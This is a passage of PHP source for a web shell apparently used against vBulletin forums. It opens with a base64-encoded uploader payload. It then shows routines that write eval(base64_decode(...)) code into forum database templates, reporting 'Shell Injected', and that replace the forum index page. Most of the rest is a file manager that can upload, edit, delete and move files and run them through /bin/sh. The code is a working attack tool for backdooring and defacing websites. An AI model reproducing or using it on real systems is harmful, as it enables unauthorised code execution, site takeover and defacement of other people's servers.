SbElDNHZkR3RzTFMwK0p6c2daV05vYnlBaVBDRXRMWFZ3Ykc5aFpDQm1hV3hsSUM0dmRHdHNMUzArSUR4c1pXWjBQaUE4Wm05eWJTQnRaWFJvYjJROUoxQlBVMVFuSUdWdVkzUjVjR1U5SjIxMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFblBpQThhVzV3ZFhRZ2RIbHdaVDBuWm1sc1pTY2dibUZ0WlQwbloyRjZZVlZRSnlCemFYcGxQU2N5TXljZ1BpQThhVzV3ZFhRZ2RIbHdaVDBuYzNWaWJXbDBKeUIyWVd4MVpUMG5WWEJzYjJGa0p5QnphWHBsUFNjek5TY2dQaUE4TDJadmNtMCtJRHd2YkdWbWRENGdQQ0V0TFNCbGJtUWdkWEJzYjJGa0lHWnBiR1VnTGk5MGEyd3RMVDRpT3lCbFkyaHZJQ1JuWVhwaFgzUmxlSFE3SUdWamFHOGdKenhqWlc1MFpYSStQR0VnYUhKbFpqMGlhSFIwY0RvdkwyZGhlbUV0YUdGamEyVnlMbTVsZENJZ2RHRnlaMlYwUFNKZllteGhibXNpUGx0SFlYcGhJRWhoUTB0bFVpQlVaV0Z0WFR3dllUNGdMU0E4WVNCb2NtVm1QU0pvZEhSd09pOHZaMkY2WVMxb1lXTnJaWEl1Ym1WMEwyTmpMMjFsYldKbGNpMTFYekl5TXpZeExtaDBiV3dpSUhSaGNtZGxkRDBpWDJKc1lXNXJJajViVkV0TVhUd3ZZVDQ4TDJObGJuUmxjajRuT3lBZ1B6ND0nOyAkZnAgPSBmb3BlbigiZ2F6YTMtdmIucGhwIiwidysiKTsgZndyaXRlKCRmcCxiYXNlNjRfZGVjb2RlKCRjb2RlKSk7IGhlYWRlcigiTG9jYXRpb246IGdhemEzLXZiLnBocCIpOw==';
$template =$_POST['template'];
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$code."\'))}}{\${exit()}}&' WHERE title ='".$template."'";
$ka= @mysql_query($p) or die(mysql_error());
if ($ka){print'Success <br> Shell Injected in '.$template;}
}
print $f;
exit;
case "VBindex":
if (!$_POST[code]){
print '
<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = vb(document.frm.code.value)">
Change index BY:<br><select size="1" name="t">
<option value="spacer_open">SPACER_OPEN</option>
<option value="spacer_close">SPACER_CLOSE</option>
</select></p>
<br> Host :<br><input name="lo" type="text" value="localhost" align="LEFT" size="18"/>
<br>DataBase Name: <br><input name="db" type="text" align="LEFT" size="18" ><Br>
<br>User Name :<br><input name="user" type="text" align="LEFT" size="15">
<br>Password :<br><input name="pass" type="text" align="MIDDLE" size="15">
<br>Table Prefix :<br><input name="tab" type="text" align="LEFT" size="15">
<br>index code[HTML]<br><textarea name="code" cols="41" rows="15" wrap="VIRTUAL" ></textarea><br>
<input type="submit" value="Change index" />';
}else{
$lost = $_POST[t];
$a ="{\${eval(base64_decode(\'";
$tkl_index = base64_encode('echo "'.$_POST[code].'</body></html>";exit;');
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$tkl_index."\'))}}' WHERE title ='".$lost."'";
$ka= @mysql_query($p) or die(mysql_error());
if ($ka){print"Success ";}
}
print $f;
exit;
}
}
function dirTKL ($dir) {
echo '<table><tr><td><u>filename</u></td><td><u>|</u></td><td><u></u></td><tr><td><textarea name="code" cols="20" rows="20" wrap="VIRTUAL">';
foreach (glob("$dir/*.*") as $filename) {
$filename= str_replace("$dir/", "", $filename);
echo $filename.PHP_EOL;
}
echo '</textarea></td></tr></table>';
}
hidTKL ();
if (!$_GET['tool'] == ''){
toolTKL ();
}
if ($_GET['tool'] == 'Files'){
function getlist ($directory) {
global $delim, $win;
if ($d = @opendir($directory)) {
while (($filename = @readdir($d)) !== false) {
$path = $directory . $filename;
if ($stat = @lstat($path)) {
$file = array(
'filename' => $filename,
'path' => $path,
'is_file' => @is_file($path),
'is_dir' => @is_dir($path),
'is_link' => @is_link($path),
'is_readable' => @is_readable($path),
'is_writable' => @is_writable($path),
'size' => $stat['size'],
'permission' => $stat['mode'],
'owner' => $stat['uid'],
'group' => $stat['gid'],
'mtime' => @filemtime($path),
'atime' => @fileatime($path),
'ctime' => @filectime($path)
);
if ($file['is_dir']) {
$file['is_executable'] = @file_exists($path . $delim . '.');
} else {
if (!$win) {
$file['is_executable'] = @is_executable($path);
} else {
$file['is_executable'] = true;
}
}
if ($file['is_link']) $file['target'] = @readlink($path);
if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
$files[] = $file;
}
}
return $files;
} else {
return false;
}
}
function sortlist (&$list, $key, $reverse) {
quicksort($list, 0, sizeof($list) - 1, $key);
if ($reverse) $list = array_reverse($list);
}
function quicksort (&$array, $first, $last, $key) {
if ($first < $last) {
$cmp = $array[floor(($first + $last) / 2)][$key];
$l = $first;
$r = $last;
while ($l <= $r) {
while ($array[$l][$key] < $cmp) $l++;
while ($array[$r][$key] > $cmp) $r--;
if ($l <= $r) {
$tmp = $array[$l];
$array[$l] = $array[$r];
$array[$r] = $tmp;
$l++;
$r--;
}
}
quicksort($array, $first, $r, $key);
quicksort($array, $l, $last, $key);
}
}
function permission_octal2string ($mode) {
if (($mode & 0xC000) === 0xC000) {
$type = 's';
} elseif (($mode & 0xA000) === 0xA000) {
$type = 'l';
} elseif (($mode & 0x8000) === 0x8000) {
$type = '-';
} elseif (($mode & 0x6000) === 0x6000) {
$type = 'b';
} elseif (($mode & 0x4000) === 0x4000) {
$type = 'd';
} elseif (($mode & 0x2000) === 0x2000) {
$type = 'c';
} elseif (($mode & 0x1000) === 0x1000) {
$type = 'p';
} else {
$type = '?';
}
$owner = ($mode & 00400) ? 'r' : '-';
$owner .= ($mode & 00200) ? 'w' : '-';
if ($mode & 0x800) {
$owner .= ($mode & 00100) ? 's' : 'S';
} else {
$owner .= ($mode & 00100) ? 'x' : '-';
}
$group = ($mode & 00040) ? 'r' : '-';
$group .= ($mode & 00020) ? 'w' : '-';
if ($mode & 0x400) {
$group .= ($mode & 00010) ? 's' : 'S';
} else {
$group .= ($mode & 00010) ? 'x' : '-';
}
$other = ($mode & 00004) ? 'r' : '-';
$other .= ($mode & 00002) ? 'w' : '-';
if ($mode & 0x200) {
$other .= ($mode & 00001) ? 't' : 'T';
} else {
$other .= ($mode & 00001) ? 'x' : '-';
}
return $type . $owner . $group . $other;
}
function is_script ($filename) {
return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
}
function getmimetype ($filename) {
static $mimes = array(
'\.jpg$|\.jpeg$' => 'image/jpeg',
'\.gif$' => 'image/gif',
'\.png$' => 'image/png',
'\.html$|\.html$' => 'text/html',
'\.txt$|\.asc$' => 'text/plain',
'\.xml$|\.xsl$' => 'application/xml',
'\.pdf$' => 'application/pdf'
);
foreach ($mimes as $regex => $mime) {
if (eregi($regex, $filename)) return $mime;
}
return 'text/plain';
}
function del ($file) {
global $delim;
if (!@is_link($file) && !file_exists($file)) return false;
if (!@is_link($file) && @is_dir($file)) {
if ($dir = @opendir($file)) {
$error = false;
while (($f = readdir($dir)) !== false) {
if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
$error = true;
}
}
closedir($dir);
if (!$error) return @rmdir($file);
return !$error;
} else {
return false;
}
} else {
return @unlink($file);
}
}
function addslash ($directory) {
global $delim;
if (substr($directory, -1, 1) != $delim) {
return $directory . $delim;
} else {
return $directory;
}
}
function relative2absolute ($string, $directory) {
if (path_is_relative($string)) {
return simplify_path(addslash($directory) . $string);
} else {
return simplify_path($string);
}
}
function path_is_relative ($path) {
global $win;
if ($win) {
return (substr($path, 1, 1) != ':');
} else {
return (substr($path, 0, 1) != '/');
}
}
function absolute2relative ($directory, $target) {
global $delim;
$path = '';
while ($directory != $target) {
if ($directory == substr($target, 0, strlen($directory))) {
$path .= substr($target, strlen($directory));
break;
} else {
$path .= '..' . $delim;
$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
}
}
if ($path == '') $path = '.';
return $path;
}
function simplify_path ($path) {
global $delim;
if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
$path = realpath($path);
if (@is_dir($path)) {
return addslash($path);
} else {
return $path;
}
}
$pattern = $delim . '.' . $delim;
if (@is_dir($path)) {
$path = addslash($path);
}
while (strpos($path, $pattern) !== false) {
$path = str_replace($pattern, $delim, $path);
}
$e = addslashes($delim);
$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
while (ereg($regex, $path)) {
$path = ereg_replace($regex, $delim, $path);
}
return $path;
}
function human_filesize ($filesize) {
$suffices = 'kMGTPE';
$n = 0;
while ($filesize >= 1000) {
$filesize /= 1024;
$n++;
}
$filesize = round($filesize, 3 - strpos($filesize, '.'));
if (strpos($filesize, '.') !== false) {
while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
$filesize = substr($filesize, 0, strlen($filesize) - 1);
}
}
$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
return $filesize . " {$suffix}B";
}
function strip (&$str) {
$str = stripslashes($str);
}
function listing_page ($message = null) {
global $self, $directory, $sort, $reverse;
html_header();
$list = getlist($directory);
if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
sortlist($list, $sort, $reverse);
echo '
<form enctype="multipart/form-data" action="' . $self . '?tool=Files" method="post">
<table id="main">
';
directory_choice();
if (!empty($message)) {
spacer();
echo $message;
}
if (@is_writable($directory)) {
upload_box();
create_box();
} else {
spacer();
}
if ($list) {
listing($list);
} else {
echo error('not_readable', $directory);
}
echo '</table>
</form>
';
html_footer();
}
function listing ($list) {
global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
echo '<tr class="listing">
<th style="text-align: center; vertical-align: middle"></th>
';
$d = 'tool=Files&dir=' . urlencode($directory) . '&amp;';
if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = '';
echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = '';
echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
if (!$win) {
if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = '';
echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = '';
echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = '';
echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
}
echo ' <th class="functions">' . word('functions') . '</th>
</tr>
';
for ($i = 0; $i < sizeof($list); $i++) {
$file = $list[$i];
$timestamps = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
echo '<tr class="listing">
<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
<td class="filename" title="' . html($timestamps) . '">';
if ($file['is_link']) {
echo html($file['filename']) . ' &rarr; ';
$real_file = relative2absolute($file['target'], $directory);
if (@is_readable($real_file)) {
if (@is_dir($real_file)) {
echo '[ <a href="' . $self . '?tool=Files&dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
} else {
echo '<a href="' . $self . '?tool=Files&action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
}
} else {
echo html($file['target']);
}
} elseif ($file['is_dir']) {
echo ' [ ';
if ($win || $file['is_executable']) {
echo '<a href="' . $self . '?tool=Files&dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
} else {
echo html($file['filename']);
}
echo ' ]';
} else {
if (substr($file['filename'], 0, 1) == '.') {
echo '';
} else {
echo '';
}
if ($file['is_file'] && $file['is_readable']) {
echo '<a href="' . $self . '?tool=Files&action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
} else {
echo html($file['filename']);
}
}
if ($file['size'] >= 1000) {
$human = ' title="' . human_filesize($file['size']) . '"';
} else {
$human = '';
}
echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
if (!$win) {
echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
if ($l) echo '<a href="' . $self . '?tool=Files&action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
echo html(permission_octal2string($file['permission']));
if ($l) echo '</a>';
echo "</td>\n";
if (array_key_exists('owner_name', $file)) {
echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
} else {
echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
}
if (array_key_exists('group_name', $file)) {
echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
} else {
echo "\t<td class=\"group\">{$file['group']}</td>\n";
}
}
echo ' <td class="functions">
<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
';
$actions = array();
if (function_exists('symlink')) {
$actions[] = 'create_symlink';
}
if (@is_writable(dirname($file['path']))) {
$actions[] = 'delete';
$actions[] = 'rename';
$actions[] = 'move';
}
if ($file['is_file'] && $file['is_readable']) {
$actions[] = 'copy';
$actions[] = 'download';
if ($file['is_writable']) $actions[] = 'edit';
}
if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
$actions[] = 'execute';
}
if (sizeof($actions) > 0) {
echo ' <select class="small" name="action' . $i . '" size="1">
<option value="">' . str_repeat('&nbsp;', 30) . '</option>
';
foreach ($actions as $action) {
echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
}
echo ' </select>
<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
';
}
echo ' </td>
</tr>
';
}
echo '<tr class="listing_footer">
<td style="text-align: right; vertical-align: top"></td>
<td colspan="' . ($cols - 1) . '">
<input type="hidden" name="num" value="' . sizeof($list) . '" />
<input type="hidden" name="focus" value="" />
<input type="hidden" name="olddir" value="' . html($directory) . '" />
';
$actions = array();
if (@is_writable(dirname($file['path']))) {
$actions[] = 'delete';
$actions[] = 'move';
}
$actions[] = 'copy';
echo ' <select class="small" name="action_all" size="1">
<option value="">' . str_repeat('&nbsp;', 30) . '</option>
';
foreach ($actions as $action) {
echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
}
echo ' </select>
<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
</td>
</tr>
';
}
function directory_choice () {
global $directory, $homedir, $cols, $self;
echo '<tr>
<td colspan="' . $cols . '" id="directory">
<a href="' . $self . '?tool=Files&dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
</td>
</tr>
';
}
function upload_box () {
global $cols;
echo '<tr>
<td colspan="' . $cols . '" id="upload">
' . word('file') . ':
<input type="file" name="upload" onfocus="activate(\'other\')" />
<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
</td>
</tr>
';
}
function create_box () {
global $cols;
echo '<tr>
<td colspan="' . $cols . '" id="create">
<select name="create_type" size="1" onfocus="activate(\'create\')">
<option value="file">' . word('file') . '</option>
<option value="directory">' . word('directory') . '</option>
</select>
<input type="text" name="create_name" onfocus="activate(\'create\')" />
<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
</td>
</tr>
';
}
function edit ($file) {
global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
html_header();
echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
<form action="' . $self . '?tool=Files" method="post">
<table class="dialog">
<tr>
<td class="dialog">
<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
if (array_key_exists('content', $_POST)) {
echo $_POST['content'];
} else {
$f = fopen($file, 'r');
while (!feof($f)) {
echo html(fread($f, 8192));
}
fclose($f);
}
if (!empty($_POST['user'])) {
echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
}
if (!empty($_POST['basic_auth'])) {
if ($win) {
$authfile = str_replace('\\', '/', $directory) . $htpasswd;
} else {
$authfile = $directory . $htpasswd;
}
echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
echo 'Require valid-user';
}
echo '</textarea>
<hr />
';
if ($apache && basename($file) == $htpasswd) {
echo '
' . word('user') . ': <input type="text" name="user" />
' . word('password') . ': <input type="password" name="password" />
<input type="submit" value="' . word('add') . '" />
<hr />
';
}
if ($apache && basename($file) == $htaccess) {
echo '
<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
<hr />
';
}
echo '
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
<input type="reset" value="' . word('reset') . '" id="red_button" />
<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
</td>
</tr>
</table>
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
</form>
';
html_footer();
}
function spacer () {
global $cols;
echo '<tr>
<td colspan="' . $cols . '" style="height: 1em"></td>
</tr>
';
}
function textfieldsize ($content) {
$size = strlen($content) + 5;
if ($size < 30) $size = 30;
return $size;
}
function request_dump () {
foreach ($_REQUEST as $key => $value) {
echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
}
}
function html ($string) {
global $charset;
return htmlentities($string, ENT_COMPAT, $charset);
}
function word ($word) {
global $words, $word_charset;
return htmlentities($words[$word], ENT_COMPAT, $word_charset);
}
function phrase ($phrase, $arguments) {
global $words;
static $search;
if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
for ($i = 0; $i < sizeof($arguments); $i++) {
$arguments[$i] = nl2br(html($arguments[$i]));
}
$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
}
function getwords ($lang) {
global $word_charset, $date_format;
switch ($lang) {
case 'en':
default:
$date_format = 'n/j/y H:i:s';
$word_charset = 'ISO-8859-1';
return array(
'directory' => 'Directory',
'file' => 'File',
'filename' => 'Filename',
'size' => 'Size',
'permission' => 'Permission',
'owner' => 'Owner',
'group' => 'Group',
'other' => 'Others',
'functions' => 'Functions',
'read' => 'read',
'write' => 'write',
'execute' => 'execute',
'create_symlink' => 'create symlink',
'delete' => 'delete',
'rename' => 'rename',
'move' => 'move',
'copy' => 'copy',
'edit' => 'edit',
'download' => 'download',
'upload' => 'upload',
'create' => 'create',
'change' => 'change',
'save' => 'save',
'set' => 'set',
'reset' => 'reset',
'relative' => 'Relative path to target',
'yes' => 'Yes',
'no' => 'No',
'back' => 'back',
'destination' => 'Destination',
'symlink' => 'Symlink',
'no_output' => 'no output',
'user' => 'User',
'password' => 'Password',
'add' => 'add',
'add_basic_auth' => 'add basic-authentification',
'uploaded' => '"[%1]" has been uploaded.',
'not_uploaded' => '"[%1]" could not be uploaded.',
'already_exists' => '"[%1]" already exists.',
'created' => '"[%1]" has been created.',
'not_created' => '"[%1]" could not be created.',
'really_delete' => 'Delete these files?',
'deleted' => "These files have been deleted:\n[%1]",
'not_deleted' => "These files could not be deleted:\n[%1]",
'rename_file' => 'Rename file:',
'renamed' => '"[%1]" has been renamed to "[%2]".',
'not_renamed' => '"[%1] could not be renamed to "[%2]".',
'move_files' => 'Move these files:',
'moved' => "These files have been moved to \"[%2]\":\n[%1]",
'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]",
'copy_files' => 'Copy these files:',
'copied' => "These files have been copied to \"[%2]\":\n[%1]",
'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" can not be edited.',
'executed' => "\"[%1]\" has been executed successfully:\n{%2}",
'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}",
'saved' => '"[%1]" has been saved.',
'not_saved' => '"[%1]" could not be saved.',
'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.',
'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.',
'permission_for' => 'Permission of "[%1]":',
'permission_set' => 'Permission of "[%1]" was set to [%2].',
'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
'not_readable' => '"[%1]" can not be read.'
);
}
}
function getimage ($image) {
}
function html_header () {
}
function html_footer () {
echo <<<END
</body>
</html>
END;
}
function notice ($phrase) {
global $cols;
$args = func_get_args();
array_shift($args);
return '<tr id="notice"><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p>
<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
</tr>
';
}
function error ($phrase) {
global $cols;
$args = func_get_args();
array_shift($args);
return '<tr id="error">
<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
</tr>
';
}
////
$homedir = './';
if (get_magic_quotes_gpc()) {
array_walk($_GET, 'strip');
array_walk($_POST, 'strip');
array_walk($_REQUEST, 'strip');
}
if (array_key_exists('image', $_GET)) {
header('Content-Type: image/gif');
die(getimage($_GET['image']));
}
$delim = DIRECTORY_SEPARATOR;
if (function_exists('php_uname')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
} else {
$win = ($delim == '\\') ? true : false;
}
if (!empty($_SERVER['PATH_TRANSLATED'])) {
$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
} elseif (function_exists('getcwd')) {
$scriptdir = getcwd();
} else {
$scriptdir = '.';
}
$homedir = relative2absolute($homedir, $scriptdir);
$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
$dir = relative2absolute($dir, $_POST['olddir']);
}
$directory = simplify_path(addslash($dir));
$files = array();
$action = '';
if (!empty($_POST['submit_all'])) {
$action = $_POST['action_all'];
for ($i = 0; $i < $_POST['num']; $i++) {
if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
$files[] = $_POST["file$i"];
}
}
} elseif (!empty($_REQUEST['action'])) {
$action = $_REQUEST['action'];
$files[] = relative2absolute($_REQUEST['file'], $directory);
} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
$files[] = $_FILES['upload'];
$action = 'upload';
} elseif (array_key_exists('num', $_POST)) {
for ($i = 0; $i < $_POST['num']; $i++) {
if (array_key_exists("submit$i", $_POST)) break;
}
if ($i < $_POST['num']) {
$action = $_POST["action$i"];
$files[] = $_POST["file$i"];
}
}
if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
$files[] = relative2absolute($_POST['create_name'], $directory);
switch ($_POST['create_type']) {
case 'directory':
$action = 'create_directory';
break;
case 'file':
$action = 'create_file';
}
}
if (sizeof($files) == 0) $action = ''; else $file = reset($files);
if ($lang == 'auto') {
if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
} else {
$lang = 'en';
}
}
$words = getwords($lang);
$cols = ($win) ? 4 : 7;
if (!isset($dirpermission)) {
$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
}
if (!isset($filepermission)) {
$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
}
if (!empty($_SERVER['SCRIPT_NAME'])) {
$self = html(basename($_SERVER['SCRIPT_NAME']));
} elseif (!empty($_SERVER['PHP_SELF'])) {
$self = html(basename($_SERVER['PHP_SELF']));
} else {
$self = '';
}
if (!empty($_SERVER['SERVER_SOFTWARE'])) {
if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
$apache = true;
} else {
$apache = false;
}
} else {
$apache = true;
}
switch ($action) {
case 'view':
if (is_script($file)) {
ob_start();
highlight_file($file);
$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
ob_end_clean();
html_header();
echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
<hr />
<table>
<tr>
<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
<pre style="margin-top: 0"><code>';
for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
echo '</code></pre>
</td>
<td style="text-align: left; vertical-align: top; padding-left: 3pt">
<pre style="margin-top: 0">' . $src . '</pre>
</td>
</tr>
</table>
';
html_footer();
} else {
echo '<textarea name="code" cols="150" rows="50" wrap="VIRTUAL" >';
readfile($file);
}
break;
case 'download':
header('Pragma: public');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Content-Type: ' . getmimetype($file));
header('Content-Disposition: attachment; filename=' . basename($file) . ';');
header('Content-Length: ' . filesize($file));
readfile($file);
break;
case 'upload':
$dest = relative2absolute($file['name'], $directory);
if (@file_exists($dest)) {
listing_page(error('already_exists', $dest));
} elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
listing_page(notice('uploaded', $file['name']));
} else {
listing_page(error('not_uploaded', $file['name']));
}
break;
case 'create_directory':
if (@file_exists($file)) {
listing_page(error('already_exists', $file));
} else {
$old = @umask(0777 & ~$dirpermission);
if (@mkdir($file, $dirpermission)) {
listing_page(notice('created', $file));
} else {
listing_page(error('not_created', $file));
}
@umask($old);
}
break;
case 'create_file':
if (@file_exists($file)) {
listing_page(error('already_exists', $file));
} else {
$old = @umask(0777 & ~$filepermission);
if (@touch($file)) {
edit($file);
} else {
listing_page(error('not_created', $file));
}
@umask($old);
}
break;
case 'execute':
chdir(dirname($file));
$output = array();
$retval = 0;
exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
$error = ($retval == 0) ? false : true;
if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
if ($error) {
listing_page(error('not_executed', $file, implode("\n", $output)));
} else {
listing_page(notice('executed', $file, implode("\n", $output)));
}
break;
case 'delete':
if (!empty($_POST['no'])) {
listing_page();
} elseif (!empty($_POST['yes'])) {
$failure = array();
$success = array();
foreach ($files as $file) {
if (del($file)) {
$success[] = $file;
} else {
$failure[] = $file;
}
}
$message = '';
if (sizeof($failure) > 0) {
$message = error('not_deleted', implode("\n", $failure));
}
if (sizeof($success) > 0) {
$message .= notice('deleted', implode("\n", $success));
}
listing_page($message);
} else {
html_header();
echo '<form action="' . $self . '?tool=Files" method="post">
<table class="dialog">
<tr>
<td class="dialog">
';
request_dump();
echo "\t<b>" . word('really_delete') . '</b>
<p>
';
foreach ($files as $file) {
echo "\t" . html($file) . "<br />\n";
}
echo ' </p>
<hr />
<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
</td>
</tr>
</table>
</form>
';
html_footer();
}
break;
case 'rename':
if (!empty($_POST['destination'])) {
$dest = relative2absolute($_POST['destination'], $directory);
if (!@file_exists($dest) && @rename($file, $dest)) {
listing_page(notice('renamed', $file, $dest));
} else {
listing_page(error('not_renamed', $file, $dest));
}
} else {
$name = basename($file);
html_header();
echo '<form action="' . $self . '?tool=Files" method="post">
<table class="dialog">
<tr>
<td class="dialog">
<input type="hidden" name="action" value="rename" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
<b>' . word('rename_file') . '</b>
<p>' . html($file) . '</p>
<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
<hr />
<input type="submit" value="' . word('rename') . '" />
</td>
</tr>
</table>
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
</form>
';
html_footer();
}
break;
case 'move':
if (!empty($_POST['destination'])) {
$dest = relative2absolute($_POST['destination'], $directory);
$failure = array();
$success = array();
foreach ($files as $file) {
$filename = substr($file, strlen($directory));
$d = $dest . $filename;
if (!@file_exists($d) && @rename($file, $d)) {
$success[] = $file;
} else {
$failure[] = $file;
}
}
$message = '';
if (sizeof($failure) > 0) {
$message = error('not_moved', implode("\n", $failure), $dest);
}
if (sizeof($success) > 0) {
